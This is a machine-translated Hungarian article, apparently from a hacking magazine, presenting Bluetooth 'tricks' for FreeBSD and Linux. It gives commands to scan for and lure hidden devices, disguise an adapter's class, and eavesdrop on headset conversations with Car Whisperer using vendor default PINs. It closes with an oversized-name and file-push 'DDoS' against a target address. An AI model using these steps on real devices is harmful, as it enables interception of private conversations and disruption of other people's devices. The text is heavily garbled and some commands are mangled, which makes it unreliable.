Trükkök bluetooth kis trükköt használja a „blue tooth”
Mindenki tudja, hogy segítségével a Bluetooth, akkor át a fájlt a készülékről az eszközön, vagy csatlakoztassa a vezeték nélküli fülhallgató. De ezek a lehetőségek nem korlátozódnak azt. Miután velük a megfelelő eszköz, akkor létrehozhat igazi csodák. Akkor miért nem próbálja magát egy bűvész?
Beépített Bluetooth (vagy, hivatalosan, IEEE 802.15.3) hosszú ideig megszűnt a ritkaság. fajlagos költsége annyira hiányos, hogy nem ágyazza be a mobil, laptop vagy PDA csak lusta gyártó. És akkor - marketing okokból. Röviden, a Bluetooth használják szinte minden. De csak kevesen tudják, hogy a technológiát, a kockázat, hogy a bizalmas adatokat. De kezdjük az összes ugyanazt a jó!
Trick 1: A BT a távoli hozzáférést a számítógéphez
Trick 2: hozzáférés vezérlése BT
Trick 3: BT-Snifaem forgalom éterből
Mastery kezdődik a megértés. Nem merül fel, ha valaha is a vágy, hogy vizsgálja meg a protokollt, és tanulj adatcsere a „blue tooth”? Bluetooth Hallgatva forgalom végezhető csak „önmagában”, amely végre, hogy elfogják a kimenő és bejövő forgalom csomópont, ahol adsz parancsokat. Ebben az esetben nagy jelentőséget az úgynevezett Host Controller Interface (HCI), amely lehetővé teszi a hozzáférést az adó. HCI-csomópont jellemzően csatlakozik egy Bluetooth eszközmeghajtó csomópontjához (downstream) és L2CAP csomópont (upstream). Az alapértelmezett Windows platformon nem nyújt ilyen lehetőséget. Azonban a külső fejlesztők kiadták
speciális meghajtó, amely lehetővé teszi, hogy lefordítani a standard dongle szippantás. Hagyományosan indikatív ebben a tekintetben a munka FTS4BT Wireless Bluetooth Protocol Analyzer. állt a szerencse. Termék érinti, hogy támogatja az új Bluetooth v2.0 + EDR. alapján, amely a modern eszközök működnek, sőt, képes repülni dekódolni az összes forgalom a levegőben, óvatosan otsortirovyvaya audio, adatok, alkalmazások, protokollok és így tovább. Egyértelmű, hogy a szippantás (és általában) a leginkább releváns USB-dongle 1. osztály, melynek hatótávolsága száz méter.
Trick 4: Munka közvetlenül BT-adapter
Sokáig Bluetooth-for Windows annyira ritka lehetőségeket. hogy a programozók egyszerűen megkerülik a platform oldalon. Ez megmagyarázza, hogy miért a programok többsége komoly szórakoztató c «blue tooth” által kidolgozott niksovuyu platform. Néhány zsák trükköt megbeszéljük, hogy ebben a platform, nevezetesen a FreeBSD (Emlékeztetem Önöket, hogy a lemez utolsó kérdés, mi lefektetett egy friss 7.0 kiadása az OS). Bluetooth technológia is lett hivatalosan támogatott rajta csak az ötödik ága alapján Netgraph alrendszer. Örülök, hogy a legtöbb USB-adapterek kompatibilisek ng_ubt vezető (ez szükséges, hogy a kapcsolat a készülék). Próbáljuk?
- A készülék csatlakoztatása: kldload ng_ubt
- Másolja a script podgruzki verem egy alkalmas helyen: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
- Másolja a script podgruzki verem egy alkalmas helyen, és futtatni: sh /usr/local/etc/rc.bluetoots indul ubt0
Most azt akarom, hogy megfeleljen hccontrol segédprogramot. Ez az egyik fő program az BT-modul. Ez volt ő, aki elvégzi a kapcsolódó műveletek a HCI felületet, és a következő szintaxist: hccontrol -n <имя_hci_узла> <команда>. Funkcionalitásának tesztelésére mi eszközök átvizsgálja a levegő jelenlétét az eszközök:
hccontrol -n ubt0hci Érdeklődés
Trick 5: megtalálni a rejtett eszközök
Egy másik lehetőség - az, hogy a passzív technikák. fordítja le a készülék készenléti üzemmódban van, és a hálózat hozzárendelni valamilyen vonzó neve:
hciconfig hci0 név BT_YANDEX
hciconfig hci0 le
hciconfig hci0 up
hcidump -V | grep bdaddr
Az eredmény azt mutatja, minden bejövő kapcsolatot, amelyek között könnyen illeszkedik rejtett azonosítók.
Trükk 6: elfogja a beszélgetések a fülhallgató-éter
Az egyik fő fenyegetések rádiós technika, hogy az adatokat lehet elfogott. Az első dolog, ami eszébe jut tekintetében Bluetooth - hallgatni az embereket beszélni, egy headset. És gyakran ez az igazi! A hacker fesztivál Mi a Hack Hollandiában szakértői Trifinite csoport megmutatta, hogyan kell használni egy laptop Linux, egy speciális program és egy irányított antenna is hallják, amint a Bluetooth-headset vezető egy elhaladó autó. A csoport kidolgozott Car Whisperer programot ( "Car suttogó"). A program jellemzői viszonylag kicsi: csak hallgatni azokat, akik elfelejtették, hogy változtatni a gyári alapértelmezett jelszót hozzáférést Bluetooth-szerű
"0000" vagy "1234". De ezek a szegénylegények, hidd el, nagyon, nagyon! „Whisper”, és képes arra, hogy sikeresen át az ék «párosítás» eszközök fogadására továbbított információ vagy karkita hedseta a mobil. Szeretném felhívni a figyelmet: az alkalmazás lehetővé teszi, hogy ne csak információt szerezni között küldött hedsetom és mobiltelefont, hanem adja a hátán. Úgy döntöttünk, hogy teszteljék a lehetőséget a program letölti a Car Whisperer a fejlesztő honlapján.
A művelet előtt célszerű megváltoztatni az osztály a készülék, különösen, ha a program a számítógéppel használható:
hciconfig adapter osztály 0x500204
# 0x500204 - egy osztály «telefon»
Ellenkező esetben néhány „okos” leves is gyanakszik. Nézd segédprogram szintaxis a következőképpen néz ki:
Van végre a fájlt közvetlenül a Utilities mappából, valamint a kimeneti jelzett out.raw:
/ Carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73
A kimenet out.raw fájlt. Hallgassa meg a tiszta formában lehetetlen: konvertálni audio formátum, amihez további haszna. Fit jó néhány audio átalakító, például SoX.
Nyers -r 8000 -c 1 -s -w out.raw -t wav -r
44100 -c 2 out.wav
A gyakorlatban ez a következőképpen néz ki. Először a keresést aktív készlet keresztül «sdptool keresés HS» parancs ami hozzávetőlegesen a válasz:
Érdeklődés.
Keresése HS a 00: 0A: 3A: 54: 71: 95.
Szolgáltatás neve: Headset
Szolgáltatás RecHandle: 0x10009
Service Class ID listája:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protokoll leíró listája:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Csatorna: 7
Nyelv Base Attr listája:
code_ISO639: 0x656e
kódolás: 0x6a
base_offset: 0x100
Profil leíró listája:
"Headset" (0x1108)
Változat: 0x0100
Nokia (00: 02 :. EE) - pin = "5475"
Audi UHV (00: 0E :. 9F) - pin = "1234"
O'Neill (00:80:37.) - pin = "8761"
Cellink (00: 0A :. 94) - pin = "1234"
Eazix (00: 0C :. 84) - pin = "1234"
Trick 7: DDoS BT-eszközök
hciconfig hci0 neve `perl -e„print "hamu" x 3137'`
# A parancs Linux
hccontrol -n adapter change_local_name "új név")
# Példa FreeBSD
- Először is, a "bomba". Egy jól ismert példa:
echo `perl -e„print "skvz" x 3137'`> file - Ezután egy módosított segédprogram kommunikálni a OBEX - USSP PUSH (xmailserver.org/ussp-push.html)
./ Obextool nyomja fájl 00: 0A: 3A: 54: 71: 95 `perl -e„print "skvz" x 3137'` 3